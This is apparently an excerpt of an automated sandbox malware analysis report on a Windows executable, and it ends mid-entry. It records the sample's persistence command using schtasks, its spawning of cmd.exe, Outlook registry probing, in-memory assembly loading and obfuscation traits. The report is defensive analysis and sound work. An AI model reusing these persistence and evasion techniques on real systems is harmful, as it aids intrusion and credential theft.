 Source: unknown Process created: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe 'C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe' Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp' Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: unknown Process created: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe {path} Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp' Jump to behavior Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Process created: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe {path} Jump to behavior
 Uses an in-process (OLE) Automation server Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
 Writes ini files Show sources
 Source: C:\Windows\SysWOW64\cmd.exe File written: C:\Users\user\AppData\Roaming\L6725004\L67logri.ini Jump to behavior
 Uses Microsoft Silverlight Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll Jump to behavior
 Checks if Microsoft Office is installed Show sources
 Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
 PE file contains a COM descriptor data directory Show sources
 Source: uVSV3amss8eu5Sr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
 Uses new MSVCR Dlls Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll Jump to behavior
 Contains modern PE file flags such as dynamic base (ASLR) or NX Show sources
 Source: uVSV3amss8eu5Sr.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
 PE file contains a debug data directory Show sources
 Source: uVSV3amss8eu5Sr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
 Binary contains paths to debug symbols Show sources
 Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.393792249.0000000007640000.00000002.00000001.sdmp Source: Binary string: wntdll.pdbUGP source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430274667.0000000001940000.00000040.00000001.sdmp, cmd.exe, 0000000D.00000002.620999075.0000000002DD0000.00000040.00000001.sdmp Source: Binary string: cmd.pdbUGP source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430741082.0000000001D60000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: uVSV3amss8eu5Sr.exe, cmd.exe Source: Binary string: cmd.pdb source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430741082.0000000001D60000.00000040.00000001.sdmp Source: Binary string: mscorrc.pdb source: uVSV3amss8eu5Sr.exe, 00000000.00000002.379292234.0000000006290000.00000002.00000001.sdmp Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.393792249.0000000007640000.00000002.00000001.sdmp

### Data Obfuscation:

 .NET source code contains potential unpacker Show sources
 Source: uVSV3amss8eu5Sr.exe, MacroReader.cs .Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) Source: JOOUCiAlE.exe.0.dr, MacroReader.cs .Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) Source: 0.2.uVSV3amss8eu5Sr.exe.160000.0.unpack, MacroReader.cs .Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) Source: 0.0.uVSV3amss8eu5Sr.exe.160000.0.unpack, MacroReader.cs .Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) Source: 3.2.uVSV3amss8eu5Sr.exe.f50000.1.unpack, MacroReader.cs .Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) Source: 3.0.uVSV3amss8eu5Sr.exe.f50000.0.unpack, MacroReader.cs .Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
 Binary contains a suspicious time stamp Show sources
 Source: initial sample Static PE information: 0xC69EE47B [Tue Aug 6 07:25:47 2075 UTC]
 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041CDF5 push eax; ret 3_2_0041CE48 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041CE42 push eax; ret 3_2_0041CE48 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041CE4B push eax; ret 3_2_0041CEB2 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041CEAC push eax; ret 3_2_0041CEB2 Source: